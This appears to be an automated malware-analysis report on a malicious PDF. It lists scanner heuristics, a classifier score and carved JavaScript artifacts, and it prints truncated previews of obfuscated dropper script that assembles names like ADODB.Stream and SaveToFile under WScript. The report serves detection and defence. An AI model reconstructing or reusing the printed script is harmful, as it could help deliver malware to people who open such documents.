Verdict: MALICIOUS
Risk Score: 148

Machine Learning
- Nyx PDF Classifier malicious score: 1.0000
Heuristics (4)
- JavaScript action (severity: low; 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (severity: critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script:
  /S /JavaScript /JS (b'\n var aMi = \'if (WScript.Path[\\x22cha\\x72At\\x22](\\x57Script.\\x50ath.\\x6cength-1) \\x21=\\x20"2") WSc\\x72ipt.\\x51\\x75it(0);\\nvar DKq3 = "e" \\x2b "";\\r\\n\\x76ar \\x58Mf = "c\\x6cos" + "";\\r\\nv\\x61r\\x20CBd7 = \\x22Fi\\x6ce" + "";\\x0d\\nvar Zd9 = \\x22\\x54o" + "";\\r\\x0av\\x61r \\x45Cz = \\x22Sa\\x76e" + "\\x22;\\r\\n\\x76ar BI\\x755 = "xt" + "";\\r\\x0avar XPj\\x34 = "T\\x65" + "";\\r\\x0avar VRr0 = \\x22write" + \\x22";\\r\\nvar Oc = "en" + "";\\r\\nvar By2 = "op" + … >>
- Embedded JS stream (severity: low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF paints image(s) but contains no text operators (severity: info) PDF_IMAGE_ONLY_LURE: PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams. This is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj0004_000.js | pdf-javascript-stream | PDF /JS object 4 at offset 0x13D | 978 bytes | d068b9a29deb00d8f09329f69885eca558d32325bd031bff1d26278a7d238eef |
| javascript_obj0004_001.js | pdf-javascript-stream | PDF /JS object 4 at offset 0x13D | 84 bytes | 2eb5c7887157dd433f0679e46c1190cc3ecb029080b6ba04fe32529eb68f9b5b |

Preview of javascript_obj0004_000.js (first 1,000 lines of the extracted script):
var aMi = 'if (WScript.Path[\x22cha\x72At\x22](\x57Script.\x50ath.\x6cength-1) \x21=\x20"2") WSc\x72ipt.\x51\x75it(0);\nvar DKq3 = "e" \x2b "";\r\n\x76ar \x58Mf = "c\x6cos" + "";\r\nv\x61r\x20CBd7 = \x22Fi\x6ce" + "";\x0d\nvar Zd9 = \x22\x54o" + "";\r\x0av\x61r \x45Cz = \x22Sa\x76e" + "\x22;\r\n\x76ar BI\x755 = "xt" + "";\r\x0avar XPj\x34 = "T\x65" + "";\r\x0avar VRr0 = \x22write" + \x22";\r\nvar Oc = "en" + "";\r\nvar By2 = "op" + "\x22\x3b\r\nvar MSc = "et" + "";\r\nvar TJu5 =\x20"Ch\x61rs" + "\x22;\r\nvar Dz1 = "type" + "";\r\nvar LOe8 = "\x6d"\x20+ "";\x0d\x0avar M\x4bc = "rea" + \x22";\r\nv\x61r ZJf1 = "DB.St" + "";\r\nvar BOt6 = "O" + "";\r\nvar F\x47g0 \x3d \x22\x44" +\x20"";\r\nvar Hr = "A\x22 + "\x22;\r\nva\x72 KC\x67\x20= \x22ject" \x2b "";\r\nva\x72 \x58O\x66 = \x22Ob"\x20+ "";\r\nvar NFm = "eate\x22 + "\x22\x3b\r\nvar Bv = "Cr\x22 +\x20""\x3b\r\nvar FO\x626 =\x20"join" + "";\r\nfuncti\x6fn WQh(J\x6d){return Jm;};\x66unc\x74\x69o\x6e VWu1\x28SPi8

Preview of javascript_obj0004_001.js (first 1,000 lines of the extracted script):
var aMi = 'if (WScript.Path[\x22cha\x72At\x22](\x57Script.\x50ath.\x6cength-1